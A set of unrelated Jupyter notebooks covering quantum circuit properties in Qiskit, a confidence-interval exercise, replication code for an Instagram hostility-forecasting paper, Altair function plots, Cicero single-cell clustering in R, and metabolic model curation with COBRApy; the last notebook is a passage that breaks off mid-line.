via qiskit: qc.num_unitary_factors() # ## Circuits with Classical Registers and Measurements <a name="classical"></a> # # Several of the circuit properties introduced so far change when adding classical registers and measurements. # # Let's add measurements to the circuit above. # + qubit_count = 12qc2 = QuantumCircuit(qubit_count, qubit_count) for idx in range(5): qc2.h(idx) qc2.cx(idx, idx + 5) qc2.cx(1, 7) qc2.x(8) qc2.cx(1, 9) qc2.x(7) qc2.cx(1, 11) qc2.swap(6, 11) qc2.swap(6, 9) qc2.swap(6, 10) qc2.x(6) qc2.barrier() qc2.measure(range(qubit_count), range(qubit_count)) qc2.draw() # - # The **width** of the circuit now includes the number of qubits _and_ number of classical bits: qc2.width() # The number of operations has increased because of the measurements and the barrier we used: qc2.count_ops() # and the **size** of the circuit has grown: qc2.size() # The **depth** of the circuit has now increased because measurements are included in the depth computation as they perform physical operations: qc2.depth() # Barriers and other special commands like snapshots do not count towards the depth directly. However, gates cannot pass through them and must therefore start stacking on top. # ## Dependence of Depth on Gate Selection <a name="gate_dependence"></a> # # We close by highlighting a very important point. The **depth** of a quantum circuit, and thus the ability to run said circuit on noisy quantum hardware depends on the choice of gates used to implement that circuit. The original circuit used in this tutorial had a depth of 9. qc.depth() # However, the SWAP gates used in the construction of that circuit are not native to the IBM Q devices. A decomposition that runs on the devices is a decomposition in terms of three CNOT gates: qc3 = QuantumCircuit(2) qc3.swap(0,1) qc3.decompose().draw() # This decomposes the swap gate into the gates we want # So the exact same circuit could be written as: # + qc4 = QuantumCircuit(12) for idx in range(5): qc4.h(idx) qc4.cx(idx, idx + 5) qc4.cx(1, 7) qc4.x(8) qc4.cx(1, 9) qc4.x(7) qc4.cx(1, 11) qc4.cx(6, 11) qc4.cx(11, 6) qc4.cx(6, 11) qc4.cx(6, 9) qc4.cx(9, 6) qc4.cx(6, 9) qc4.cx(6, 10) qc4.cx(10, 6) qc4.cx(6, 10) qc4.x(6) qc4.draw() # - # That has a depth approaching twice that of the original circuit qc4.depth() # This simple example is meant to illustrate a very important point: **When running circuits on actual quantum devices, the circuit that gets run is in general not the same circuit that you constructed**. In addition, the depth of that new circuit is likely to be larger, and in some cases much larger, than the original one. Fortunately, often times one can reduce this overhead through smart circuit rewriting toolchains. import qiskit.tools.jupyter # %qiskit_version_table # %qiskit_copyright
legacy_tutorials/terra/4_quantum_circuit_properties.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # 4.8 Twitter users and news # + import math """ Confidence Interval of 95% Function pe = the population point estimate std = standard deviation of the population sample_size = size of the sample """ #Standard error method that comes into computation def standard_error(std, sample_size): return (std/(math.sqrt(sample_size))) def ci_99(pe, se): z = 2.576 ci_minus = pe - (z * se) ci_plus = pe + (z * se) ci = (ci_minus,ci_plus) #returns a tuple return ci # - # **Given Data :** # <br/> # point estimate = 52%<br/> # Standard Error = 2.4% # Creating a 99 % confidence interval for the proportion of US adults Twitter users who get some news on Twitter. ci_99(52,2.4) # **<u>Inference : </u> : ** We are 99% confident that the proporion of U.S. adults using Twitter getting some news out of it falls between 45.8176, 58.1824
Chapter 4/Exercises/4.8_Twitter_News_1.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] deletable=true editable=true # This notebook provides code to reproduce the primary figures and tables in the paper # # > <NAME>, <NAME>, <NAME>, and <NAME>. "Forecasting the presence and intensity of hostility on Instagram using linguistic and social features." In *Proceedings of the Twelfth International AAAI Conference on Web and Social Media (ICWSM'18)* # # # Note that while all data used was publicly available, in order to respect user privacy and Instagram's terms of service, we are unfortunately unable to share publicly the raw data needed to replicate the results in this notebook. # + deletable=true editable=true # Imports and setup. # %load_ext autoreload # %autoreload 2 from collections import Counter, defaultdict from itertools import chain, combinations, cycle from IPython.display import display import json import math import matplotlib.pyplot as plt import numpy as np import os import pandas as pd import random import re from sklearn.feature_extraction.text import CountVectorizer from sklearn.feature_selection import chi2 from sklearn.linear_model import LogisticRegression from sklearn.metrics import roc_auc_score import tarfile from urllib.request import urlretrieve path = 'data/' os.environ['NOBULL_PATH'] = path import u # %matplotlib inline u.config_matplotlib() # + deletable=true editable=true def download_data(path): """ Download any required files if not already present. """ url = 'https://www.dropbox.com/s/5lvcowbq9kqpvkc/data.tgz?dl=1' if not os.path.exists(path + os.path.sep + 'model.w2v'): zipname = 'data.tgz' print('fetching data (1.5G)') urlretrieve(url, zipname) tar = tarfile.open(zipname, "r:gz") print('extracting %s' % zipname) tar.extractall() tar.close() else: print('data already exists in %s' % path) download_data(path) # + [markdown] deletable=true editable=true # ## Task 1 # # Given first $N$ comments, predict whether a hostile comment will appear $K$ hours in the future or later. # + deletable=true editable=true # Read raw data. task1_posts = u.load_posts(path + 'task1_data.json', path + 'task1_labels.json') print('read %d posts' % len(task1_posts)) # + deletable=true editable=true def get_feature_indices(feature_names, feature_classes): print('%d feature classes, %d features' % (len(feature_classes), sum(len(f) for f in feature_names))) res = {} i = 0 for fc, fns in zip(feature_classes, feature_names): res[fc] = np.arange(i, i+len(fns)) i += len(fns) return res def concat_indices(feature_class2indices, classes): return np.concatenate([feature_class2indices[c] for c in classes]) def enum_feature_subsets(feature_class2indices): "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)" s = list(feature_class2indices.keys()) return ((classes, concat_indices(feature_class2indices, classes)) for classes in chain.from_iterable(combinations(s, r) for r in range(1, len(s)+1))) def select_results(results, num_features, used_features): selected = [] for i, r in enumerate(results.iterrows()): if len(r[1]['features']) == num_features and len(used_features - set(r[1]['features'])) == 0: selected.append(i) return results.iloc[selected] def print_results_table(results): """ Print feature comparison table. """ res = select_results(results, 2, set(['Unigram'])) table = pd.concat([results[results.features==('Unigram',)], res.sort_values('AUC', ascending=True), results.sort_values('AUC', ascending=False).head(1)]) print('best features:', table.features.values[-1]) pd.options.display.max_colwidth = 100 names = [t[0] if len(t) == 1 else 'U + %s' % t[1] for t in table['features']] names[-1] = 'Best' table['features'] = names table = table[['features', 'AUC', 'F1', 'Precision', 'Recall']] table = table.set_index('features') display(table.iloc[0]) display(table) print(table.to_latex(bold_rows=True, float_format='%.3f', index=True)) def get_lines(): random.seed(42) markers = ['o', '^', 's', '*', 'D'] lines = ['-', '--', '-.', ':', '--'] colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k'] for i in range(5): mi = list(markers) random.shuffle(mi) markers += mi li = list(lines) random.shuffle(li) lines += li ci = list(colors) random.shuffle(ci) colors += ci return cycle(['%s%s%s' % (c, m, l) for c, l, m in zip(colors, lines, markers)]) # + deletable=true editable=true def task1_expts(posts, lead_time=3, max_lead_time=10): """ Perform all experiments for Task 1 and generate Table 2. """ task1_sampled_posts = u.sample_posts_task1(posts, lead_time=max_lead_time*60*60) task1_sampled_posts = u.set_observed_comments(task1_sampled_posts, lead_time=lead_time*60*60) X, vec, feature_names, feature_classes = u.vectorize(task1_sampled_posts) feature_class2indices = get_feature_indices(feature_names, feature_classes) display(sorted([(fc, len(i)) for fc, i in feature_class2indices.items()], key=lambda x: x[1])) all_results = [] y = np.array([1 if p['num_hostile'] > 0 else 0 for p in task1_sampled_posts]) label_counts = Counter(y) print(label_counts) for feature_classes, col_indices in enum_feature_subsets(feature_class2indices): res = { 'features': feature_classes, 'n_instances': len(y), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} XX = X[:,col_indices] # run cross-validation n_comments = np.array([p['n_comments_observed'] for p in task1_sampled_posts]) res.update(u.cv(XX, y, n_splits=10, n_comments=n_comments)) all_results.append(res) return pd.DataFrame(all_results), feature_class2indices task1_results, feature_class2indices = task1_expts(task1_posts, lead_time=3) print_results_table(task1_results) # + deletable=true editable=true # Create table of AUC vs lead time def task1_lead_time_fig(posts, lead_times, features): """ Produce Figure 3, hostility presence forecasting accuracy as lead time increases. """ # resample and vectorize according to each lead_time all_results = [] # to ensure comparability, we'll sample posts using longest lead times, then # reuse the for shorter lead times posts = u.sample_posts_task1(posts, lead_time=max(lead_times)*60*60) for lead_time in lead_times: task1_sampled_posts = u.set_observed_comments(posts, lead_time=lead_time*60*60) X, vec, feature_names, feature_classes = u.vectorize(task1_sampled_posts) feature_class2indices = get_feature_indices(feature_names, feature_classes) y = np.array([1 if p['num_hostile'] > 0 else 0 for p in task1_sampled_posts]) label_counts = Counter(y) n_comments = np.array([p['n_comments_observed'] for p in task1_sampled_posts]) for feature_list in features: col_indices = concat_indices(feature_class2indices, feature_list) XX = X[:, col_indices] res = { 'features': feature_list, 'lead_time': lead_time, 'n_instances': len(y), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} # run cross-validation res.update(u.cv(XX, y, n_splits=10, n_comments=n_comments)) all_results.append(res) results_df = pd.DataFrame(all_results) plot_task1_lead_time_fig(results_df) return results_df def plot_task1_lead_time_fig(task1_res_fig, nfolds=10): plt.figure() linecycler = get_lines() for fnames in sorted([x for x in set(task1_res_fig.features)], key=lambda x: -len(x)): df = task1_res_fig[task1_res_fig.features==fnames] rr = df.sort_values('lead_time')[['lead_time', 'AUC', 'AUC_sd']].values xvals = rr[:,0] yvals = rr[:,1] stderrs = rr[:,2] / math.sqrt(nfolds) # standard error marker = next(linecycler) plt.plot(xvals, yvals, marker, label='+'.join(fnames)) plt.errorbar(xvals, yvals, fmt=marker, yerr=stderrs) plt.xlabel('lead time (hours)') plt.ylabel('AUC') plt.legend(loc='lower left') plt.setp(plt.legend().get_texts(), fontsize='12') plt.ylim((.73, .855)) plt.tight_layout() plt.savefig('forecast_time.pdf') plt.show() task1_lead_time_results = task1_lead_time_fig(task1_posts, lead_times=[1, 3, 5, 8, 10], features=[('Unigram', 'lex'), ('Unigram', 'lex', 'w2v'), ('Unigram', 'lex', 'n-w2v'), ('Unigram', 'lex', 'n-w2v', 'prev-post', 'trend'), ] ) # + deletable=true editable=true def task1_n_comments_fig(posts, features, lead_time=3): """ Produce Figure 4, hostility presence forecasting AUC as the number of observed comments increases. """ task1_sampled_posts = u.sample_posts_task1(posts, lead_time=lead_time*60*60) X, vec, feature_names, feature_classes = u.vectorize(task1_sampled_posts) feature_class2indices = get_feature_indices(feature_names, feature_classes) y = np.array([1 if p['num_hostile'] > 0 else 0 for p in task1_sampled_posts]) label_counts = Counter(y) all_results = [] n_comments = np.array([p['n_comments_observed'] for p in task1_sampled_posts]) for feature_list in features: col_indices = concat_indices(feature_class2indices, feature_list) XX = X[:, col_indices] res = { 'features': feature_list, 'lead_time': lead_time, 'n_instances': len(y), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} res.update(u.cv(XX, y, n_splits=10, n_comments=n_comments)) all_results.append(res) df = pd.DataFrame(all_results) plot_task1_n_comments_fig(df) return df def plot_task1_n_comments_fig(df): bins = {'1': [1], '2': [2], '3': [3], '4-6': [4,5,6], '7-9': [7,8,9], '>=10': range(10,500) } plt.figure() linecycler = get_lines() for features, by_n_comments in df[['features', 'by_n_comments']][::-1].values: # group results by number of comments nc2res = defaultdict(list) for x in by_n_comments: nc2res[x[2]].append((x[0], x[1])) rocs = [] for label, ncs in sorted(bins.items()): res = [] for nc in ncs: res.extend(nc2res[nc]) rocs.append(roc_auc_score([v[0] for v in res], [v[1] for v in res], average=None)) plt.plot(rocs, next(linecycler), label='+'.join(features)) plt.xticks(range(len(bins)), sorted(bins)) plt.legend(loc='lower right') plt.xlabel('number of observed comments') plt.ylabel('AUC') plt.ylim((.4, 1)) plt.setp(plt.legend().get_texts(), fontsize='12') plt.savefig('forecast_comments.pdf') plt.show() n_comments_res = task1_n_comments_fig(task1_posts, features=[('Unigram', 'lex'), ('Unigram', 'lex', 'w2v'), ('Unigram', 'lex', 'n-w2v'), ('Unigram', 'lex', 'n-w2v', 'prev-post', 'trend'), ], lead_time=3) # + deletable=true editable=true """ Print the top features per class according to the logistic regression coefficients, including the top terms in each word2vec dimension. """ def load_predicted_vectors(words, w2v=u.w2v_model_3gram, dim=100): vecs = [] for wd in words: vecs.append(u.get_vector(wd, w2v, dim)) return np.array(vecs) def get_top_w2v_words(words, word_vecs, idx, n=20): return words[word_vecs[:,idx].argsort()[::-1][:n]] def get_top_features_task1(task1_posts, lead_time=3, nfeats=40, features=('Unigram', 'user', 'trend', 'lex', 'n-w2v', 'final-com', 'prev-post')): task1_sampled_posts = u.sample_posts_task1(task1_posts, lead_time=3*60*60) X, vec, feature_names, feature_classes = u.vectorize(task1_sampled_posts) feature_class2indices = get_feature_indices(feature_names, feature_classes) y = np.array([1 if p['num_hostile'] > 0 else 0 for p in task1_sampled_posts]) col_indices = concat_indices(feature_class2indices, features) XX = X[:,col_indices] clf = LogisticRegression(class_weight='balanced') clf.fit(XX, y) fnames = np.concatenate(feature_names) fnames = fnames[col_indices] words = np.array(feature_names[feature_classes.index('Unigram')]) word_vecs = load_predicted_vectors(words) results = [] for i in np.argsort(clf.coef_[0])[::-1][:nfeats]: res = {'feature': fnames[i], 'coef': clf.coef_[0][i]} if 'neww2v' in fnames[i]: idx = int(re.findall('_([0-9]+)\-', fnames[i])[0]) res['w2v'] = ' '.join(get_top_w2v_words(words, word_vecs, idx)) results.append(res) results = pd.DataFrame(results) display(results) return results # + deletable=true editable=true get_top_features_task1(task1_posts) # + [markdown] deletable=true editable=true # ## Task 2 # # Given the first $N$ comments up to and including the first hostile comment, predict whether there will be less than $M$ or more than $Q$ hostile comments total. # + deletable=true editable=true task2_posts = u.load_posts(path + 'task2_data.json', path + 'task2_labels.json') u.set_n_comments_observed_task2(task2_posts) print('read %d posts' % len(task2_posts)) # + deletable=true editable=true # Vectorize X, vec, feature_names, feature_classes = u.vectorize(task2_posts) X.shape # + deletable=true editable=true feature_class2indices = get_feature_indices(feature_names, feature_classes) sorted([(fc, len(i)) for fc, i in feature_class2indices.items()], key=lambda x: x[1]) # + deletable=true editable=true def task2_expts(posts, X, vec, feature_class2indices, max_for_neg_class=1, min_for_pos_class=10): """ Perform task 2 experiments and produce Table 3, forecasting AUC with N=10 """ all_results = [] idx = u.filter_by_num_hostile(posts, max_for_neg_class=max_for_neg_class, min_for_pos_class=min_for_pos_class) Xi = X[idx] postsi = posts[idx] y = np.array([1 if p['num_hostile'] >= min_for_pos_class else 0 for p in postsi]) label_counts = Counter(y) for feature_classes, col_indices in enum_feature_subsets(feature_class2indices): res = { 'features': feature_classes, 'max_for_neg_class': max_for_neg_class, 'min_for_pos_class': min_for_pos_class, 'n_instances': len(idx), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} XX = Xi[:,col_indices] # run cross-validation res.update(u.cv(XX, y, n_splits=10)) all_results.append(res) return pd.DataFrame(all_results) task2_results = task2_expts(task2_posts, X, vec, feature_class2indices) print_results_table(task2_results) # + deletable=true editable=true """ Produce Figure 5, hostility intensity forecasting AUC as the positive class threshold increases. """ def task2_min_for_pos_class_fig(task2_results, posts, X, vec, feature_class2indices, features, max_for_neg_class=1, min_for_pos_class_list=range(5,11)): col_indices = concat_indices(feature_class2indices, features) X = X[:,col_indices] all_results = [] for min_for_pos_class in min_for_pos_class_list: idx = u.filter_by_num_hostile(posts, max_for_neg_class=max_for_neg_class, min_for_pos_class=min_for_pos_class) Xi = X[idx] postsi = posts[idx] y = np.array([1 if p['num_hostile'] >= min_for_pos_class else 0 for p in postsi]) label_counts = Counter(y) res = { 'features': feature_classes, 'max_for_neg_class': max_for_neg_class, 'min_for_pos_class': min_for_pos_class, 'n_instances': len(idx), 'n_pos': label_counts[1], 'n_neg': label_counts[0]} # run cross-validation res.update(u.cv(Xi, y, n_splits=10)) all_results.append(res) results_df = pd.DataFrame(all_results) plot_task2_fig(results_df) return results_df def plot_task2_fig(task2_res_fig, nfolds=10): rr = task2_res_fig.sort_values('min_for_pos_class')[['min_for_pos_class', 'AUC', 'AUC_sd']].values xvals = rr[:,0] yvals = rr[:,1] stderrs = rr[:,2] / math.sqrt(nfolds) ## assuming 10-fold cv plt.figure() plt.plot(xvals, yvals, 'bo-') plt.errorbar(xvals, yvals, fmt='b', yerr=stderrs) plt.xlabel('minimum number of hostile comments\nin positive class') plt.ylabel('AUC') plt.tight_layout() plt.savefig('intensity_threshold.pdf') plt.show() task2_pos_class_res = task2_min_for_pos_class_fig(task2_results, task2_posts, X, vec, feature_class2indices, features=('Unigram', 'lex', 'n-w2v', 'prev-post', 'trend', 'user', 'final-com'), max_for_neg_class=1, min_for_pos_class_list=range(5,16)) # + deletable=true editable=true """ Print the top features for task 2 according to the logistic regression coefficients. """ def get_top_features_task2(task2_posts, X, vec, feature_class2indices, feature_names, feature_classes, features=('Unigram', 'user', 'trend', 'lex', 'n-w2v', 'final-com', 'prev-post'), min_for_pos_class=10, max_for_neg_class=1, nfeats=40): idx = u.filter_by_num_hostile(task2_posts, max_for_neg_class=max_for_neg_class, min_for_pos_class=min_for_pos_class) Xi = X[idx] postsi = task2_posts[idx] y = np.array([1 if p['num_hostile'] >= min_for_pos_class else 0 for p in postsi]) col_indices = concat_indices(feature_class2indices, features) XX = Xi[:,col_indices] clf = LogisticRegression(class_weight='balanced') clf.fit(XX, y) fnames = np.concatenate(feature_names) fnames = fnames[col_indices] words = np.array(feature_names[feature_classes.index('Unigram')]) word_vecs = load_predicted_vectors(words) results = [] for i in np.argsort(clf.coef_[0])[::-1][:nfeats]: res = {'feature': fnames[i], 'coef': clf.coef_[0][i]} if 'neww2v' in fnames[i]: idx = int(re.findall('_([0-9]+)\-', fnames[i])[0]) res['w2v'] = ' '.join(get_top_w2v_words(words, word_vecs, idx)) results.append(res) results = pd.DataFrame(results) return results get_top_features_task2(task2_posts, X, vec, feature_class2indices, feature_names, feature_classes, features=('Unigram', 'user', 'trend', 'lex', 'n-w2v', 'final-com', 'prev-post'), min_for_pos_class=10, max_for_neg_class=1) # + deletable=true editable=true """ Print top terms for task1 and task2 according to chi-squared. """ def top_hostile_terms(task1_posts, min_for_pos_class=10): comments_task1 = [] comments_task2 = [] labels_task1 = [] labels_task2 = [] for p in task1_posts: task2_label = 1 if p['num_hostile'] >= min_for_pos_class else 0 for c,l in zip(p['comments'], p['labels']): labels_task1.append(0 if l=='Innocuous' else 1) text = u.cleanText(c) comments_task1.append(text) if labels_task1[-1] == 1: comments_task2.append(text) labels_task2.append(task2_label) vec = CountVectorizer(min_df=5, binary=True) X1 = vec.fit_transform(comments_task1) y1 = np.array(labels_task1) feats1 = np.array(vec.get_feature_names()) X2 = vec.fit_transform(comments_task2) y2 = np.array(labels_task2) feats2 = np.array(vec.get_feature_names()) def top_coef(X, y, feats, n=50): chi, _ = chi2(X, y) pos_counts = X[np.where(y==1)].sum(axis=0).A1 neg_counts = X[np.where(y==0)].sum(axis=0).A1 clf = LogisticRegression() clf.fit(X,y) coef = clf.coef_[0] for i in np.argsort(chi)[::-1][:n]: if coef[i] > 0: print(chi[i], pos_counts[i], neg_counts[i], feats[i]) print('top terms predictive of hostile vs. non-hostile comment') top_coef(X1, y1, feats1, n=50) print('\n\n\ntop terms predictive of intense vs. non-intense hostility') top_coef(X2, y2, feats2, n=50) top_hostile_terms(task1_posts, min_for_pos_class=10)
Replication.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Graphing mathematical functions with Altair # [Altair][1] is a python graphing package by <NAME>. Let's give it a try. # # [1]: https://altair-viz.github.io/index.html import altair as alt import pandas as pd import numpy as np # ## Line x = np.arange(-10, 11, 1) y = 2 * x + 3 y source = pd.DataFrame({ 'x': x, 'y': y }) source alt.Chart(source).mark_line(point=True, clip=True).encode( alt.X('x', scale=alt.Scale(domain=(-20, 20)) ), y='y' ) # ## Parabola x = np.arange(-10, 11, 1) y = x**2 source = pd.DataFrame({ 'x': x, 'y': y }) alt.Chart(source).mark_line(point=True).encode( x=alt.X('x'), y='y' ) # ## Square root x = np.arange(0, 26, 0.1) y = np.sqrt(x) source = pd.DataFrame({ 'x': x, 'y': y }) a = alt.Chart(source).mark_line(point=True).encode( x=alt.X('x'), y='y' ) a.properties(height=500, width=700) # ## Circle # + r = 10 i = 0.1 x1 = np.arange(-10, 10.1, i) x2 = np.arange(10, -10.1, -i) y1 = np.sqrt(r**2 - x1**2) y2 = -np.sqrt(r**2 - x2**2) x = np.concatenate((x1, x2)) y = np.concatenate((y1, y2)) # - source = pd.DataFrame({ 'x': x, 'y': y }) source a = alt.Chart(source).mark_line(point=True).encode( alt.X('x', scale=alt.Scale(domain=(-12, 12)), sort=[False], ), alt.Y('y', scale=alt.Scale(domain=(-12, 12)), ), ) a.properties(height=500, width=520)
notebooks/graphing.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .r # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: R [conda env:ATACseq_Cicero] # language: R # name: conda-env-ATACseq_Cicero-r # --- # ### Installation # + # if (!requireNamespace("BiocManager", quietly = TRUE)) # install.packages("BiocManager") # BiocManager::install("cicero") # - # Vignette: https://www.bioconductor.org/packages/devel/bioc/vignettes/cicero/inst/doc/website.html # ### Import packages library(cicero) library(data.table) library(Matrix) library(proxy) library(reshape2) library(BuenColors) library(umap) # ### Load Data load('../../run_methods/Cicero/Cicero_10xpbmc5k.RData') # ### Cluster cells dim(datafr) dim(fm_Cicero) fm_Cicero[1:5,1:5] pd <- new("AnnotatedDataFrame", data = data.frame(label=metadata[colnames(fm_Cicero),'label'],row.names =colnames(fm_Cicero))) fd <- new("AnnotatedDataFrame", data = data.frame(row.names =rownames(fm_Cicero))) cds <- newCellDataSet(fm_Cicero, phenoData = pd, featureData = fd, expressionFamily = tobit()) cds <- detectGenes(cds) cds <- estimateSizeFactors(cds) # cds <- estimateDispersions(cds) cds <- reduceDimension(cds, max_components = 2, num_dim = 15,reduction_method = 'tSNE', verbose = T) cds <- clusterCells(cds,num_clusters = length(unique(metadata$label)),method = 'densityPeak') plot_cell_clusters(cds, 1, 2, color = "label") plot_cell_clusters(cds, 1, 2, color = "Cluster") df_out = data.frame(Cicero = cds$Cluster, row.names = sampleNames(phenoData(cds))) all(rownames(df_out) == rownames(metadata)) head(df_out) write.table(df_out, file='clusteringSolution.tsv', quote=FALSE, sep='\t', col.names = NA)
Real_Data/10x_PBMC_5k/extra_clustering/Cicero/Cicero_10xpbmc5k.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Introduction # In notebook '12. Manual curation mass balances.ipynb' I fixed the mass balance of many of the reactions assigned to me. After having a meeting with Ben and Martyn, I've gained some input on how to fix the remaining mass imbalanced reactions from the list assigned to me. This notebook will cover fixing those with the approximate ways that was recommended. import cameo import pandas as pd import cobra.io import escher from cobra import Model, Reaction, Metabolite #e. coli model for comparison where necessary model_e_coli = cameo.load_model("iML1515") model_e_coli_MG1655 = cameo.load_model("iJO1366") model = cobra.io.read_sbml_model('../../model/p-thermo.xml') model.metabolites.ahdt_c.formula = 'C9H12N5O13P3' model.metabolites.ahdt_c.charge = -4 model.reactions.AHETDYTTPHY.add_metabolites({model.metabolites.h_c:-1}) model.metabolites.arbt6p_c.name = 'Arbutin 6-phosphate' model.reactions.ARBTPT.notes['NOTES']:'Phosphate group donor mimicked here' model.reactions.ARBTPT.add_metabolites({model.metabolites.pi_c:-1, model.metabolites.h2o_c: 1}) model.metabolites.arbt6p_c.formula = 'C12H15O10P' model.metabolites.arbt6p_c.charge = -2 model.metabolites.glutrna_c.formula = 'C5H7NO3R' #need to add the tRNA metabolite model.add_metabolites(Metabolite(id = 'trnaglu_c')) model.metabolites.trnaglu_c.name = 'TRNA (Glu)' model.metabolites.trnaglu_c.formula = 'R' model.metabolites.trnaglu_c.charge = 0 model.metabolites.trnaglu_c.compartment = 'c' model.metabolites.trnaglu_c.annotation = model_e_coli.metabolites.trnaglu_c.annotation model.reactions.GLUTRS.add_metabolites({model.metabolites.trnaglu_c:-1}) model.reactions.GLUTRR.add_metabolites({model.metabolites.trnaglu_c:1}) model.metabolites.nh4_c.name = 'Ammonium' model.metabolites.nh4_e.name = 'Ammonium' # To tackle the reactions involving cellulose, we need to find a new way to represent its hydrolysis to ensure mass balance and correct functioning of the model. # # cellulose_c is involved in two reactions: BGLUCH and CELLOHYDRO. The difference between these reactions: # - BGLUCH is the cellulose hydrolysis to beta-D-glucose + cellulose # - CELLOHYDRO is the hydrolysis of cellulose to cellobiose + cellulose. # # To deal with this, I will represent the cellulose as two single units, instead of a long chain polymer. This will maintain mass balance and functioning of the model, but is something that should be considered when trying to model growth of the organism on cellulose. model.metabolites.cellb_c.name = 'Cellobiose' model.metabolites.cellulose_c.formula = 'C12H20O10' model.reactions.CELLOHYDRO.add_metabolites({model.metabolites.cellulose_c:-11}) model.reactions.BGLUCH.add_metabolites({model.metabolites.cellulose_c:10, model.metabolites.glc__bD_c:1, model.metabolites.h2o_c:-1}) # For RCT UAAAGGLAAT I will change the chemical formula of gmagg_c to just reflect the group it donates to the reaction (e.g. similar to cellulose) instead of it being a polymer gmagg_c is only in this reaction so it should be oke. # model.metabolites.gmagg_c.formula = 'C39H64N8O19' model.metabolites.gmagg_e.formula = 'C39H64N8O19' model.reactions.UAAAGGLAAT.add_metabolites({model.metabolites.h_c:-1}) #here add a phosphate donor group model.reactions.ACMUMPT.add_metabolites({model.metabolites.pi_c:-1, model.metabolites.h2o_c:1.0}) model.metabolites.acmum6p_c.formula = 'C11H17NO11P' model.metabolites.acmum_c.formula = 'C11H18NO8' model.metabolites.acmum_e.formula = 'C11H18NO8' model.metabolites.acmum_c.charge = -1 model.metabolites.acmum6p_c.charge = -3 # For rct BTN5AMPL, I will get rid of the enzyme that catalyses the reaction here. So the reaction appears to have a free AMP bound to free biotin, which is a mimic of the true reactions. # This is because the enzyme-bound biotin is currently not in the model, and I dont want to create new dead-end and orphan metabolites as these will not run unless they are fixed. model.metabolites.btn_c.name = 'Biotin' model.reactions.BTN5AMPL.add_metabolites({model.metabolites.btn_c:1.0, model.metabolites.coa_c:1.0, model.metabolites.ACP_c:-1, model.metabolites.h2o_c:-1, model.metabolites.h_c:2}) model.metabolites.b5amp_c.formula = 'C20H27N7O9PS' model.metabolites.b5amp_c.charge = -1 model.metabolites.btn_c.formula = 'C10H15N2O3S' model.metabolites.btn_c.charge = -1 # For rcts ACCOAACT and ACCOATT we need to add an extra metabolite: 1-Acyl-sn-glycerol-3-phosphate. model.add_metabolites(Metabolite(id = 'aglyc3p_c')) model.metabolites.aglyc3p_c.name = '1-Acyl-sn-glycerol 3-phosphate' model.metabolites.aglyc3p_c.formula = 'C4H7O7PR' model.metabolites.aglyc3p_c.charge = -2 model.metabolites.aglyc3p_c.compartment = 'c' model.metabolites.aglyc3p_c.notes['KEGG'] = 'C00681' model.reactions.ACCOAACT.add_metabolites({model.metabolites.aglyc3p_c:1.0}) model.metabolites.acoa_c.charge = -4 model.metabolites.acoa_c.formula = 'C22H32N7O17P3SR' model.reactions.ACCOATT.add_metabolites({model.metabolites.aglyc3p_c:-1}) model.metabolites.pa_EC_c.formula = 'C5H7O8PR2' # The ACEDIA reaction has an undefined electron model.reactions.ACEDIA.add_metabolites({model.metabolites.hacc_c:2}) #Save&commit cobra.io.write_sbml_model(model,'../../model/p-thermo.xml') model = cobra.io.read_sbml_model('../../model/p-thermo.xml') #SELMELIG: this is a dead-end reaction anyway, so can be removed rct = model.reactions.SELMELIG model.remove_reactions(rct) #save&commit cobra.io.write_sbml_model(model,'../../model/p-thermo.xml') #also the SAM reaction should be removed. As it is just the donor rct, with no methyl acceptor accompanying it. #there are many other reactions involving the same metabolites where there is a proper acceptor associated to it, these should remain. rct_remove = model.reactions.SAM model.remove_reactions(rct_remove) cobra.io.write_sbml_model(model,'../../model/p-thermo.xml') model = cobra.io.read_sbml_model('../../model/p-thermo.xml') # __Modify the ACEDIA reaction.__ # This reaction contains an undefined electron acceptor. This is also a non-enzymatic reaction. So I cannot find any data on possible cofactors it uses: it is predicted to be accepted by NAD, NADP, quinone or flavin. This makes it difficult to incorporate. # # In Bacillus subtilis iYO844 model, the reaction is ACLDC and is: alac__S_c + h_c --> actn__R_c + co2_c. So possibly one could ignore the electrons and just reflect it as the hydrogen? # # Looking more into the model, I have also found the alac__S_b_c metabolite. This should be removed. # # So I propose: I add a metabolite as an electron that is formed in this reaction. Then subsequently I add 3 reactions that take up the formed electron to generate NADPH, NADH, ferredoxin or quinone. Then the stoichiometry of metabolism will dictate which co-factor is used in the model here. # # __Duplicate metabolites__ # Here I saw that there is the actn_c and actn__R_c metabolites. Also, we have alac__S_b_C and alac__S_c metabolites. These two should be merged and then we can figure out the reactions involved. #remove PYRACTT and PYRACT: they are both the same as ACLS #should be irreversible, as our bug doesn't assimilate CO2. model.remove_reactions(model.reactions.PYRACTT) model.remove_reactions(model.reactions.PYRACT) #remove ALACPH, it is the same as APLh model.remove_reactions(model.reactions.ALACPH) #remove DHMBISO, same as DMORh. #directionality: should be irreversible considering NADPH is involved model.reactions.DMORh.id = 'DMOR' model.reactions.DMOR.bounds = (-1000,0) model.remove_reactions(model.reactions.DHMBISO) #remove duplicate alac__S_b_c model.remove_metabolites(model.metabolites.alac__S_b_c) model.reactions.APLh.id = 'APL' #remove dhmb metabolite #remove DHMBHL, same as DHAD1 model.remove_reactions(model.reactions.DHMBHL) model.remove_metabolites(model.metabolites.dhmb_c) #rename model.reactions.ACTNAT.id = 'ACTD2' #merge reactions actn_c to actn__R_c and remove the actn_c reactions model.reactions.ACTD2.add_metabolites({model.metabolites.actn__R_c:-1, 